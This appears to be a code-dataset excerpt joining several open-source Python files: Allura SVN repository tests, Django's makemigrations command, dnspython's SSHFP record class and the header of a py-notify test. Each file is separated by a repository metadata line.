assert os.path.isfile(fn), fn
snapshot = ZipFile(fn, 'r')
assert_equal(sorted(snapshot.namelist()), trunk_content)
os.remove(fn)
self.svn_tags.tarball(rev, '/trunk/some/path/')
assert os.path.isfile(fn), fn
snapshot = ZipFile(fn, 'r')
assert_equal(sorted(snapshot.namelist()), trunk_content)
os.remove(fn)
# no path, but there are trunk in the repo
# expect snapshot of trunk
self.svn_tags.tarball(rev)
assert os.path.isfile(fn), fn
snapshot = ZipFile(fn, 'r')
assert_equal(sorted(snapshot.namelist()), trunk_content)
os.remove(fn)
# no path, and no trunk dir
# expect snapshot of repo root
h.set_context('test', 'src', neighborhood='Projects')
fn = os.path.join(tmpdir, 'svn/t/te/test/testsvn/test-src-1.zip')
self.repo.tarball('1')
assert os.path.isfile(fn), fn
snapshot = ZipFile(fn, 'r')
assert_equal(snapshot.namelist(), ['test-src-1/', 'test-src-1/README'])
shutil.rmtree(os.path.join(tmpdir, 'svn/t/te/test/testsvn/'),
ignore_errors=True)
shutil.rmtree(tarball_path, ignore_errors=True)
def test_is_empty(self):
assert not self.repo.is_empty()
with TempDirectory() as d:
repo2 = SM.Repository(
name='test',
fs_path=d.path,
url_path='/test/',
tool='svn',
status='creating')
repo2.init()
assert repo2.is_empty()
repo2.refresh()
ThreadLocalORMSession.flush_all()
assert repo2.is_empty()
class TestSVNRev(unittest.TestCase):
def setUp(self):
setup_basic_test()
self.setup_with_tools()
@with_svn
def setup_with_tools(self):
setup_global_objects()
h.set_context('test', 'src', neighborhood='Projects')
repo_dir = pkg_resources.resource_filename(
'forgesvn', 'tests/data/')
self.repo = SM.Repository(
name='testsvn',
fs_path=repo_dir,
url_path='/test/',
tool='svn',
status='creating')
self.repo.refresh()
self.rev = self.repo.commit(1)
ThreadLocalORMSession.flush_all()
ThreadLocalORMSession.close_all()
def test_url(self):
assert self.rev.url().endswith('/1/')
def test_primary(self):
assert self.rev.primary() == self.rev
def test_shorthand(self):
assert self.rev.shorthand_id() == '[r1]'
def test_diff(self):
diffs = (self.rev.diffs.added
+ self.rev.diffs.removed
+ self.rev.diffs.changed
+ self.rev.diffs.copied)
for d in diffs:
print d
def _oid(self, rev_id):
return '%s:%s' % (self.repo._id, rev_id)
def test_log(self):
# path only
commits = list(self.repo.log(self.repo.head, id_only=True))
assert_equal(commits, [6, 5, 4, 3, 2, 1])
commits = list(self.repo.log(self.repo.head, 'README', id_only=True))
assert_equal(commits, [3, 1])
commits = list(self.repo.log(1, 'README', id_only=True))
assert_equal(commits, [1])
commits = list(self.repo.log(self.repo.head, 'a/b/c/', id_only=True))
assert_equal(commits, [4, 2])
commits = list(self.repo.log(3, 'a/b/c/', id_only=True))
assert_equal(commits, [2])
assert_equal(
list(self.repo.log(self.repo.head, 'does/not/exist', id_only=True)), [])
def test_notification_email(self):
setup_global_objects()
h.set_context('test', 'src', neighborhood='Projects')
repo_dir = pkg_resources.resource_filename(
'forgesvn', 'tests/data/')
self.repo = SM.Repository(
name='testsvn',
fs_path=repo_dir,
url_path='/test/',
tool='svn',
status='creating')
self.repo.refresh()
ThreadLocalORMSession.flush_all()
send_notifications(self.repo, [self.repo.rev_to_commit_id(1)])
ThreadLocalORMSession.flush_all()
n = M.Notification.query.find(
dict(subject='[test:src] [r1] - rick446: Create readme')).first()
assert n
assert_equal(n.text, 'Create readme http://localhost/p/test/src/1/')
class _Test(unittest.TestCase):
idgen = ('obj_%d' % i for i in count())
def _make_tree(self, object_id, **kwargs):
t, isnew = M.repo.Tree.upsert(object_id)
repo = getattr(self, 'repo', None)
t.repo = repo
for k, v in kwargs.iteritems():
if isinstance(v, basestring):
obj = M.repo.Blob(
t, k, self.idgen.next())
t.blob_ids.append(Object(
name=k, id=obj._id))
else:
obj = self._make_tree(self.idgen.next(), **v)
t.tree_ids.append(Object(
name=k, id=obj._id))
session(t).flush()
return t
def _make_commit(self, object_id, **tree_parts):
ci, isnew = M.repo.Commit.upsert(object_id)
if isnew:
ci.committed.email = c.user.email_addresses[0]
ci.authored.email = c.user.email_addresses[0]
dt = datetime.utcnow()
# BSON datetime resolution is to 1 millisecond, not 1 microsecond
# like Python. Round this now so it'll match the value that's
# pulled from MongoDB in the tests.
ci.authored.date = dt.replace(
microsecond=dt.microsecond / 1000 * 1000)
ci.message = 'summary\n\nddescription'
ci.set_context(self.repo)
ci.tree_id = 't_' + object_id
ci.tree = self._make_tree(ci.tree_id, **tree_parts)
return ci, isnew
def _make_log(self, ci):
session(ci).flush(ci)
rb = M.repo_refresh.CommitRunBuilder([ci._id])
rb.run()
rb.cleanup()
def setUp(self):
setup_basic_test()
setup_global_objects()
ThreadLocalORMSession.flush_all()
ThreadLocalORMSession.close_all()
self.prefix = tg.config.get('scm.repos.root', '/')
class _TestWithRepo(_Test):
def setUp(self):
super(_TestWithRepo, self).setUp()
h.set_context('test', neighborhood='Projects')
c.project.install_app('svn', 'test1')
h.set_context('test', 'test1', neighborhood='Projects')
self.repo = M.Repository(name='test1', tool='svn')
self.repo._impl = mock.Mock(spec=M.RepositoryImplementation())
self.repo._impl.shorthand_for_commit = M.RepositoryImplementation.shorthand_for_commit
self.repo._impl.url_for_commit = (
lambda *a, **kw: M.RepositoryImplementation.url_for_commit(
self.repo._impl, *a, **kw))
self.repo._impl._repo = self.repo
self.repo._impl.all_commit_ids = lambda *a, **kw: []
self.repo._impl.commit().symbolic_ids = None
ThreadLocalORMSession.flush_all()
# ThreadLocalORMSession.close_all()
class _TestWithRepoAndCommit(_TestWithRepo):
def setUp(self):
super(_TestWithRepoAndCommit, self).setUp()
self.ci, isnew = self._make_commit('foo')
ThreadLocalORMSession.flush_all()
# ThreadLocalORMSession.close_all()
class TestRepo(_TestWithRepo):
def test_create(self):
assert self.repo.fs_path == os.path.join(self.prefix, 'svn/p/test/')
assert self.repo.url_path == '/p/test/'
assert self.repo.full_fs_path == os.path.join(
self.prefix, 'svn/p/test/test1')
def test_passthrough(self):
argless = ['init']
for fn in argless:
getattr(self.repo, fn)()
getattr(self.repo._impl, fn).assert_called_with()
unary = ['commit', 'open_blob']
for fn in unary:
getattr(self.repo, fn)('foo')
getattr(self.repo._impl, fn).assert_called_with('foo')
def test_shorthand_for_commit(self):
self.assertEqual(
self.repo.shorthand_for_commit('a' * 40),
'[aaaaaa]')
def test_url_for_commit(self):
self.assertEqual(
self.repo.url_for_commit('a' * 40),
'/p/test/test1/ci/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/')
@mock.patch('allura.model.repository.g.post_event')
def test_init_as_clone(self, post_event):
self.repo.init_as_clone('srcpath', 'srcname', 'srcurl')
assert self.repo.upstream_repo.name == 'srcname'
assert self.repo.upstream_repo.url == 'srcurl'
assert self.repo._impl.clone_from.called_with('srcpath')
post_event.assert_called_once_with('repo_cloned', 'srcurl', 'srcpath')
def test_latest(self):
ci = mock.Mock()
self.repo._impl.commit = mock.Mock(return_value=ci)
assert self.repo.latest() is ci
def test_index(self):
i = self.repo.index()
assert i['type_s'] == 'Repository', i
assert i['name_s'] == 'test1', i
def test_scm_host_url(self):
assert (
self.repo.clone_url('rw', 'nobody')
== 'svn+ssh://nobody@localhost:8022/scm-repo/p/test/test1/'),\
self.repo.clone_url('rw', 'nobody')
assert (
self.repo.clone_url('https', 'nobody')
== 'https://nobody@localhost:8022/scm-repo/p/test/test1/'),\
self.repo.clone_url('https', 'nobody')
def test_merge_request(self):
M.MergeRequest.upsert(app_config_id=c.app.config._id, status='open')
M.MergeRequest.upsert(app_config_id=c.app.config._id, status='closed')
session(M.MergeRequest).flush()
session(M.MergeRequest).clear()
assert self.repo.merge_requests_by_statuses('open').count() == 1
assert self.repo.merge_requests_by_statuses('closed').count() == 1
assert self.repo.merge_requests_by_statuses(
'open', 'closed').count() == 2
def test_guess_type(self):
assert self.repo.guess_type('foo.txt') == ('text/plain', None)
assert self.repo.guess_type('foo.gbaer') == (
'application/octet-stream', None)
assert self.repo.guess_type('foo.html') == ('text/html', None)
assert self.repo.guess_type('.gitignore') == ('text/plain', None)
def test_refresh(self):
committer_name = 'Test Committer'
committer_email = '[email protected]'
ci = mock.Mock()
ci.authored.name = committer_name
ci.committed.name = committer_name
ci.committed.email = committer_email
ci.author_url = '/u/test-committer/'
ci.activity_name = '[deadbeef]'
ci.activity_url = 'url'
ci.activity_extras = {}
del ci.node_id
self.repo._impl.commit = mock.Mock(return_value=ci)
self.repo._impl.new_commits = mock.Mock(
return_value=['foo%d' % i for i in range(100)])
self.repo._impl.all_commit_ids = mock.Mock(
return_value=['foo%d' % i for i in range(100)])
self.repo.symbolics_for_commit = mock.Mock(
return_value=[['master', 'branch'], []])
def refresh_commit_info(oid, seen, lazy=False):
M.repo.CommitDoc(dict(
authored=dict(
name=committer_name,
email=committer_email),
_id=oid)).m.insert()
self.repo._impl.refresh_commit_info = refresh_commit_info
_id = lambda oid: getattr(oid, '_id', str(oid))
self.repo.shorthand_for_commit = lambda oid: '[' + _id(oid) + ']'
self.repo.url_for_commit = lambda oid: '/ci/' + _id(oid) + '/'
self.repo.refresh()
ThreadLocalORMSession.flush_all()
notifications = M.Notification.query.find().all()
for n in notifications:
if '100 new commits' in n.subject:
assert "master,branch: by %s http://localhost/ci/foo99" % committer_name in n.text
break
else:
assert False, 'Did not find notification'
assert M.Feed.query.find(dict(
author_name=committer_name)).count() == 100
def test_refresh_private(self):
ci = mock.Mock()
self.repo._impl.commit = mock.Mock(return_value=ci)
self.repo._impl.new_commits = mock.Mock(
return_value=['foo%d' % i for i in range(100)])
# make unreadable by *anonymous, so additional notification logic
# executes
self.repo.acl = []
c.project.acl = []
self.repo.refresh()
def test_push_upstream_context(self):
self.repo.init_as_clone('srcpath', '/p/test/svn/', '/p/test/svn/')
old_app_instance = M.Project.app_instance
try:
M.Project.app_instance = mock.Mock(return_value=ming.base.Object(
config=ming.base.Object(_id=None)))
with self.repo.push_upstream_context():
assert c.project.shortname == 'test'
finally:
M.Project.app_instance = old_app_instance
def test_pending_upstream_merges(self):
self.repo.init_as_clone('srcpath', '/p/test/svn/', '/p/test/svn/')
old_app_instance = M.Project.app_instance
try:
M.Project.app_instance = mock.Mock(return_value=ming.base.Object(
config=ming.base.Object(_id=None)))
self.repo.pending_upstream_merges()
finally:
M.Project.app_instance = old_app_instance
class TestMergeRequest(_TestWithRepoAndCommit):
def setUp(self):
super(TestMergeRequest, self).setUp()
c.project.install_app('svn', 'test2')
h.set_context('test', 'test2', neighborhood='Projects')
self.repo2 = M.Repository(name='test2', tool='svn')
self.repo2._impl = mock.Mock(spec=M.RepositoryImplementation())
self.repo2._impl.log = lambda *a, **kw: (['foo'], [])
self.repo2._impl.all_commit_ids = lambda *a, **kw: []
self.repo2._impl._repo = self.repo2
self.repo2.init_as_clone('/p/test/', 'test1', '/p/test/test1/')
ThreadLocalORMSession.flush_all()
ThreadLocalORMSession.close_all()
def test_upsert(self):
h.set_context('test', 'test1', neighborhood='Projects')
mr = M.MergeRequest.upsert(
downstream=ming.base.Object(
project_id=c.project._id,
mount_point='test2',
commit_id='foo:2'),
target_branch='foobranch',
summary='summary',
description='description')
u = M.User.by_username('test-admin')
assert_equal(mr.creator, u)
assert_equal(mr.creator_name, u.get_pref('display_name'))
assert_equal(mr.creator_url, u.url())
assert_equal(mr.downstream_url, '/p/test/test2/')
assert_equal(mr.downstream_repo_url,
'http://svn.localhost/p/test/test2/')
with mock.patch('forgesvn.model.svn.SVNLibWrapper') as _svn,\
mock.patch('forgesvn.model.svn.SVNImplementation._map_log') as _map_log:
mr.app.repo._impl.head = 1
_svn().log.return_value = [mock.Mock(revision=mock.Mock(number=2))]
_map_log.return_value = 'bar'
assert_equal(mr.commits, ['bar'])
# can't do assert_called_once_with because pysvn.Revision doesn't
# compare nicely
assert_equal(_svn().log.call_count, 1)
assert_equal(_svn().log.call_args[0],
('file:///tmp/svn/p/test/test2',))
assert_equal(_svn().log.call_args[1]['revision_start'].number, 2)
assert_equal(_svn().log.call_args[1]['limit'], 25)
_map_log.assert_called_once_with(
_svn().log.return_value[0], 'file:///tmp/svn/p/test/test2', None)
class TestRepoObject(_TestWithRepoAndCommit):
def test_upsert(self):
obj0, isnew0 = M.repo.Tree.upsert('foo1')
obj1, isnew1 = M.repo.Tree.upsert('foo1')
assert obj0 is obj1
assert isnew0 and not isnew1
def test_artifact_methods(self):
assert self.ci.index_id(
) == 'allura/model/repo/Commit#foo', self.ci.index_id()
assert self.ci.primary() is self.ci, self.ci.primary()
class TestCommit(_TestWithRepo):
def setUp(self):
super(TestCommit, self).setUp()
self.ci, isnew = self._make_commit(
'foo',
a=dict(
a=dict(
a='',
b='',),
b=''))
self.tree = self.ci.tree
impl = M.RepositoryImplementation()
impl._repo = self.repo
self.repo._impl.shorthand_for_commit = impl.shorthand_for_commit
self.repo._impl.url_for_commit = impl.url_for_commit
def test_upsert(self):
obj0, isnew0 = M.repo.Commit.upsert('foo')
obj1, isnew1 = M.repo.Commit.upsert('foo')
assert obj0 is obj1
assert not isnew1
u = M.User.by_username('test-admin')
assert self.ci.author_url == u.url()
assert self.ci.committer_url == u.url()
assert self.ci.tree is self.tree
assert self.ci.summary == 'summary'
assert self.ci.shorthand_id() == '[foo]'
assert self.ci.url() == '/p/test/test1/ci/foo/'
def test_get_path(self):
b = self.ci.get_path('a/a/a')
assert isinstance(b, M.repo.Blob)
x = self.ci.get_path('a/a')
assert isinstance(x, M.repo.Tree)
def _unique_blobs(self):
def counter():
counter.i += 1
return counter.i
counter.i = 0
blobs = defaultdict(counter)
from cStringIO import StringIO
return lambda blob: StringIO(str(blobs[blob.path()]))
def test_compute_diffs(self):
self.repo._impl.commit = mock.Mock(return_value=self.ci)
self.repo._impl.open_blob = self._unique_blobs()
M.repo_refresh.refresh_commit_trees(self.ci, {})
M.repo_refresh.compute_diffs(self.repo._id, {}, self.ci)
# self.ci.compute_diffs()
assert_equal(self.ci.diffs.added,
['a', 'a/a', 'a/a/a', 'a/a/b', 'a/b'])
assert (self.ci.diffs.copied
== self.ci.diffs.changed
== self.ci.diffs.removed
== [])
ci, isnew = self._make_commit('bar')
ci.parent_ids = ['foo']
self._make_log(ci)
M.repo_refresh.refresh_commit_trees(ci, {})
M.repo_refresh.compute_diffs(self.repo._id, {}, ci)
assert_equal(ci.diffs.removed, ['a', 'a/a', 'a/a/a', 'a/a/b', 'a/b'])
assert (ci.diffs.copied
== ci.diffs.changed
== ci.diffs.added
== [])
ci, isnew = self._make_commit(
'baz',
b=dict(
a=dict(
a='',
b='',),
b=''))
ci.parent_ids = ['foo']
self._make_log(ci)
M.repo_refresh.refresh_commit_trees(ci, {})
M.repo_refresh.compute_diffs(self.repo._id, {}, ci)
assert_equal(ci.diffs.added, ['b', 'b/a', 'b/a/a', 'b/a/b', 'b/b'])
assert_equal(ci.diffs.removed, ['a', 'a/a', 'a/a/a', 'a/a/b', 'a/b'])
assert (ci.diffs.copied
== ci.diffs.changed
== [])
def test_diffs_file_renames(self):
def open_blob(blob):
blobs = {
u'a': u'Leia',
u'/b/a/a': u'Darth Vader',
u'/b/a/b': u'Luke Skywalker',
u'/b/b': u'Death Star will destroy you',
u'/b/c': u'Luke Skywalker', # moved from /b/a/b
# moved from /b/b and modified
u'/b/a/z': u'Death Star will destroy you\nALL',
}
from cStringIO import StringIO
return StringIO(blobs.get(blob.path(), ''))
self.repo._impl.open_blob = open_blob
self.repo._impl.commit = mock.Mock(return_value=self.ci)
M.repo_refresh.refresh_commit_trees(self.ci, {})
M.repo_refresh.compute_diffs(self.repo._id, {}, self.ci)
assert_equal(self.ci.diffs.added,
['a', 'a/a', 'a/a/a', 'a/a/b', 'a/b'])
assert (self.ci.diffs.copied
== self.ci.diffs.changed
== self.ci.diffs.removed
== [])
ci, isnew = self._make_commit(
'bar',
b=dict(
a=dict(
a='',
b='',),
b=''))
ci.parent_ids = ['foo']
self._make_log(ci)
M.repo_refresh.refresh_commit_trees(ci, {})
M.repo_refresh.compute_diffs(self.repo._id, {}, ci)
assert_equal(ci.diffs.added, ['b', 'b/a', 'b/a/a', 'b/a/b', 'b/b'])
assert_equal(ci.diffs.removed, ['a', 'a/a', 'a/a/a', 'a/a/b', 'a/b'])
assert (ci.diffs.copied
== ci.diffs.changed
== [])
ci, isnew = self._make_commit(
'baz',
b=dict(
a=dict(
z=''),
c=''))
ci.parent_ids = ['bar']
self._make_log(ci)
M.repo_refresh.refresh_commit_trees(ci, {})
M.repo_refresh.compute_diffs(self.repo._id, {}, ci)
assert_equal(ci.diffs.added, [])
assert_equal(ci.diffs.changed, [])
assert_equal(ci.diffs.removed, ['b/a/a'])
# see mock for open_blob
assert_equal(len(ci.diffs.copied), 2)
assert_equal(ci.diffs.copied[0]['old'], 'b/a/b')
assert_equal(ci.diffs.copied[0]['new'], 'b/c')
assert_equal(ci.diffs.copied[0]['ratio'], 1)
assert_equal(ci.diffs.copied[0]['diff'], '')
assert_equal(ci.diffs.copied[1]['old'], 'b/b')
assert_equal(ci.diffs.copied[1]['new'], 'b/a/z')
assert ci.diffs.copied[1]['ratio'] < 1, ci.diffs.copied[1]['ratio']
assert '+++' in ci.diffs.copied[1]['diff'], ci.diffs.copied[1]['diff']
def test_context(self):
self.ci.context()
class TestRename(unittest.TestCase):
def setUp(self):
setup_basic_test()
self.setup_with_tools()
@with_svn
def setup_with_tools(self):
setup_global_objects()
h.set_context('test', 'src', neighborhood='Projects')
repo_dir = pkg_resources.resource_filename(
'forgesvn', 'tests/data/')
self.repo = SM.Repository(
name='testsvn-rename',
fs_path=repo_dir,
url_path='/test/',
tool='svn',
status='creating')
self.repo.refresh()
self.rev = self.repo.commit('HEAD')
ThreadLocalORMSession.flush_all()
ThreadLocalORMSession.close_all()
def test_log_file_with_rename(self):
entry = list(self.repo.log(path='/dir/b.txt', id_only=False))[0]
assert_equal(entry['id'], 3)
assert_equal(entry['rename_details']['path'], '/dir/a.txt')
assert_equal(
entry['rename_details']['commit_url'],
self.repo.url_for_commit(2) # previous revision
)
def test_check_changed_path(self):
changed_path = {'copyfrom_path': '/test/path', 'path': '/test/path2'}
result = self.repo._impl._check_changed_path(
changed_path, '/test/path2/file.txt')
assert_equal({'path': '/test/path2/file.txt',
'copyfrom_path': '/test/path/file.txt'}, result)
| apache-2.0 |
benjaminjkraft/django | django/core/management/commands/makemigrations.py | 10 | 13506 | import os
import sys
import warnings
from itertools import takewhile
from django.apps import apps
from django.core.management.base import BaseCommand, CommandError
from django.db.migrations import Migration
from django.db.migrations.autodetector import MigrationAutodetector
from django.db.migrations.loader import MigrationLoader
from django.db.migrations.questioner import (
InteractiveMigrationQuestioner, MigrationQuestioner,
NonInteractiveMigrationQuestioner,
)
from django.db.migrations.state import ProjectState
from django.db.migrations.writer import MigrationWriter
from django.utils.deprecation import RemovedInDjango20Warning
from django.utils.six import iteritems
from django.utils.six.moves import zip
class Command(BaseCommand):
help = "Creates new migration(s) for apps."
def add_arguments(self, parser):
parser.add_argument('args', metavar='app_label', nargs='*',
help='Specify the app label(s) to create migrations for.')
parser.add_argument('--dry-run', action='store_true', dest='dry_run', default=False,
help="Just show what migrations would be made; don't actually write them.")
parser.add_argument('--merge', action='store_true', dest='merge', default=False,
help="Enable fixing of migration conflicts.")
parser.add_argument('--empty', action='store_true', dest='empty', default=False,
help="Create an empty migration.")
parser.add_argument('--noinput', '--no-input',
action='store_false', dest='interactive', default=True,
help='Tells Django to NOT prompt the user for input of any kind.')
parser.add_argument('-n', '--name', action='store', dest='name', default=None,
help="Use this name for migration file(s).")
parser.add_argument('-e', '--exit', action='store_true', dest='exit_code', default=False,
help='Exit with error code 1 if no changes needing migrations are found. '
'Deprecated, use the --check option instead.')
parser.add_argument('--check', action='store_true', dest='check_changes',
help='Exit with a non-zero status if model changes are missing migrations.')
def handle(self, *app_labels, **options):
self.verbosity = options.get('verbosity')
self.interactive = options.get('interactive')
self.dry_run = options.get('dry_run', False)
self.merge = options.get('merge', False)
self.empty = options.get('empty', False)
self.migration_name = options.get('name')
self.exit_code = options.get('exit_code', False)
check_changes = options['check_changes']
if self.exit_code:
warnings.warn(
"The --exit option is deprecated in favor of the --check option.",
RemovedInDjango20Warning
)
# Make sure the app they asked for exists
app_labels = set(app_labels)
bad_app_labels = set()
for app_label in app_labels:
try:
apps.get_app_config(app_label)
except LookupError:
bad_app_labels.add(app_label)
if bad_app_labels:
for app_label in bad_app_labels:
self.stderr.write("App '%s' could not be found. Is it in INSTALLED_APPS?" % app_label)
sys.exit(2)
# Load the current graph state. Pass in None for the connection so
# the loader doesn't try to resolve replaced migrations from DB.
loader = MigrationLoader(None, ignore_no_migrations=True)
# Before anything else, see if there's conflicting apps and drop out
# hard if there are any and they don't want to merge
conflicts = loader.detect_conflicts()
# If app_labels is specified, filter out conflicting migrations for unspecified apps
if app_labels:
conflicts = {
app_label: conflict for app_label, conflict in iteritems(conflicts)
if app_label in app_labels
}
if conflicts and not self.merge:
name_str = "; ".join(
"%s in %s" % (", ".join(names), app)
for app, names in conflicts.items()
)
raise CommandError(
"Conflicting migrations detected; multiple leaf nodes in the "
"migration graph: (%s).\nTo fix them run "
"'python manage.py makemigrations --merge'" % name_str
)
# If they want to merge and there's nothing to merge, then politely exit
if self.merge and not conflicts:
self.stdout.write("No conflicts detected to merge.")
return
# If they want to merge and there is something to merge, then
# divert into the merge code
if self.merge and conflicts:
return self.handle_merge(loader, conflicts)
if self.interactive:
questioner = InteractiveMigrationQuestioner(specified_apps=app_labels, dry_run=self.dry_run)
else:
questioner = NonInteractiveMigrationQuestioner(specified_apps=app_labels, dry_run=self.dry_run)
# Set up autodetector
autodetector = MigrationAutodetector(
loader.project_state(),
ProjectState.from_apps(apps),
questioner,
)
# If they want to make an empty migration, make one for each app
if self.empty:
if not app_labels:
raise CommandError("You must supply at least one app label when using --empty.")
# Make a fake changes() result we can pass to arrange_for_graph
changes = {
app: [Migration("custom", app)]
for app in app_labels
}
changes = autodetector.arrange_for_graph(
changes=changes,
graph=loader.graph,
migration_name=self.migration_name,
)
self.write_migration_files(changes)
return
# Detect changes
changes = autodetector.changes(
graph=loader.graph,
trim_to_apps=app_labels or None,
convert_apps=app_labels or None,
migration_name=self.migration_name,
)
if not changes:
# No changes? Tell them.
if self.verbosity >= 1:
if len(app_labels) == 1:
self.stdout.write("No changes detected in app '%s'" % app_labels.pop())
elif len(app_labels) > 1:
self.stdout.write("No changes detected in apps '%s'" % ("', '".join(app_labels)))
else:
self.stdout.write("No changes detected")
if self.exit_code:
sys.exit(1)
else:
self.write_migration_files(changes)
if check_changes:
sys.exit(1)
def write_migration_files(self, changes):
"""
Takes a changes dict and writes them out as migration files.
"""
directory_created = {}
for app_label, app_migrations in changes.items():
if self.verbosity >= 1:
self.stdout.write(self.style.MIGRATE_HEADING("Migrations for '%s':" % app_label) + "\n")
for migration in app_migrations:
# Describe the migration
writer = MigrationWriter(migration)
if self.verbosity >= 1:
# Display a relative path if it's below the current working
# directory, or an absolute path otherwise.
migration_string = os.path.relpath(writer.path)
if migration_string.startswith('..'):
migration_string = writer.path
self.stdout.write(" %s:\n" % (self.style.MIGRATE_LABEL(migration_string),))
for operation in migration.operations:
self.stdout.write(" - %s\n" % operation.describe())
if not self.dry_run:
# Write the migrations file to the disk.
migrations_directory = os.path.dirname(writer.path)
if not directory_created.get(app_label):
if not os.path.isdir(migrations_directory):
os.mkdir(migrations_directory)
init_path = os.path.join(migrations_directory, "__init__.py")
if not os.path.isfile(init_path):
open(init_path, "w").close()
# We just do this once per app
directory_created[app_label] = True
migration_string = writer.as_string()
with open(writer.path, "wb") as fh:
fh.write(migration_string)
elif self.verbosity == 3:
# Alternatively, makemigrations --dry-run --verbosity 3
# will output the migrations to stdout rather than saving
# the file to the disk.
self.stdout.write(self.style.MIGRATE_HEADING(
"Full migrations file '%s':" % writer.filename) + "\n"
)
self.stdout.write("%s\n" % writer.as_string())
def handle_merge(self, loader, conflicts):
"""
Handles merging together conflicted migrations interactively,
if it's safe; otherwise, advises on how to fix it.
"""
if self.interactive:
questioner = InteractiveMigrationQuestioner()
else:
questioner = MigrationQuestioner(defaults={'ask_merge': True})
for app_label, migration_names in conflicts.items():
# Grab out the migrations in question, and work out their
# common ancestor.
merge_migrations = []
for migration_name in migration_names:
migration = loader.get_migration(app_label, migration_name)
migration.ancestry = [
mig for mig in loader.graph.forwards_plan((app_label, migration_name))
if mig[0] == migration.app_label
]
merge_migrations.append(migration)
all_items_equal = lambda seq: all(item == seq[0] for item in seq[1:])
merge_migrations_generations = zip(*[m.ancestry for m in merge_migrations])
common_ancestor_count = sum(1 for common_ancestor_generation
in takewhile(all_items_equal, merge_migrations_generations))
if not common_ancestor_count:
raise ValueError("Could not find common ancestor of %s" % migration_names)
# Now work out the operations along each divergent branch
for migration in merge_migrations:
migration.branch = migration.ancestry[common_ancestor_count:]
migrations_ops = (loader.get_migration(node_app, node_name).operations
for node_app, node_name in migration.branch)
migration.merged_operations = sum(migrations_ops, [])
# In future, this could use some of the Optimizer code
# (can_optimize_through) to automatically see if they're
# mergeable. For now, we always just prompt the user.
if self.verbosity > 0:
self.stdout.write(self.style.MIGRATE_HEADING("Merging %s" % app_label))
for migration in merge_migrations:
self.stdout.write(self.style.MIGRATE_LABEL(" Branch %s" % migration.name))
for operation in migration.merged_operations:
self.stdout.write(" - %s\n" % operation.describe())
if questioner.ask_merge(app_label):
# If they still want to merge it, then write out an empty
# file depending on the migrations needing merging.
numbers = [
MigrationAutodetector.parse_number(migration.name)
for migration in merge_migrations
]
try:
biggest_number = max(x for x in numbers if x is not None)
except ValueError:
biggest_number = 1
subclass = type("Migration", (Migration, ), {
"dependencies": [(app_label, migration.name) for migration in merge_migrations],
})
new_migration = subclass("%04i_merge" % (biggest_number + 1), app_label)
writer = MigrationWriter(new_migration)
if not self.dry_run:
# Write the merge migrations file to the disk
with open(writer.path, "wb") as fh:
fh.write(writer.as_string())
if self.verbosity > 0:
self.stdout.write("\nCreated new merge migration %s" % writer.path)
elif self.verbosity == 3:
# Alternatively, makemigrations --merge --dry-run --verbosity 3
# will output the merge migrations to stdout rather than saving
# the file to the disk.
self.stdout.write(self.style.MIGRATE_HEADING(
"Full merge migrations file '%s':" % writer.filename) + "\n"
)
self.stdout.write("%s\n" % writer.as_string())
| bsd-3-clause |
4shadoww/hakkuframework | core/lib/dns/rdtypes/ANY/SSHFP.py | 8 | 2829 | # Copyright (C) 2005-2007, 2009-2011 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import struct
import binascii
import dns.rdata
import dns.rdatatype
class SSHFP(dns.rdata.Rdata):
"""SSHFP record
@ivar algorithm: the algorithm
@type algorithm: int
@ivar fp_type: the digest type
@type fp_type: int
@ivar fingerprint: the fingerprint
@type fingerprint: string
@see: draft-ietf-secsh-dns-05.txt"""
__slots__ = ['algorithm', 'fp_type', 'fingerprint']
def __init__(self, rdclass, rdtype, algorithm, fp_type,
fingerprint):
super(SSHFP, self).__init__(rdclass, rdtype)
self.algorithm = algorithm
self.fp_type = fp_type
self.fingerprint = fingerprint
def to_text(self, origin=None, relativize=True, **kw):
return '%d %d %s' % (self.algorithm,
self.fp_type,
dns.rdata._hexify(self.fingerprint,
chunksize=128))
@classmethod
def from_text(cls, rdclass, rdtype, tok, origin=None, relativize=True):
algorithm = tok.get_uint8()
fp_type = tok.get_uint8()
chunks = []
while 1:
t = tok.get().unescape()
if t.is_eol_or_eof():
break
if not t.is_identifier():
raise dns.exception.SyntaxError
chunks.append(t.value.encode())
fingerprint = b''.join(chunks)
fingerprint = binascii.unhexlify(fingerprint)
return cls(rdclass, rdtype, algorithm, fp_type, fingerprint)
def to_wire(self, file, compress=None, origin=None):
header = struct.pack("!BB", self.algorithm, self.fp_type)
file.write(header)
file.write(self.fingerprint)
@classmethod
def from_wire(cls, rdclass, rdtype, wire, current, rdlen, origin=None):
header = struct.unpack("!BB", wire[current: current + 2])
current += 2
rdlen -= 2
fingerprint = wire[current: current + rdlen].unwrap()
return cls(rdclass, rdtype, header[0], header[1], fingerprint)
| mit |
kived/py-cnotify | test/variable.py | 4 | 15715 | # -*- coding: utf-8 -*-
#--------------------------------------------------------------------#
# This file is part of Py-notify. #
# #
# Copyright (C) 2007, 2008 Paul Pogonyshev. #
# #
# This library is free software; you can redistribute it and/or #
# modify it under the terms of the GNU Lesser General Public License #
# as published by the Free Software Foundation; either version 2.1 #
# of the License, or (at your option) any later version. #
# #
# This library is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU #
# Lesser General Public License for more details. #
# #
# You should have received a copy of the GNU Lesser General Public #
# License along with this library; if not, write to the Free #
# Software Foundation, Inc., 51 Franklin Street, Fifth Floor, #
# Boston, MA 02110-1301 USA #
#--------------------------------------------------------------------#
if __name__ == '__main__':
import os
import sys
sys.path.insert (0, os.path.join (sys.path[0], os.pardir))
import math
import unittest
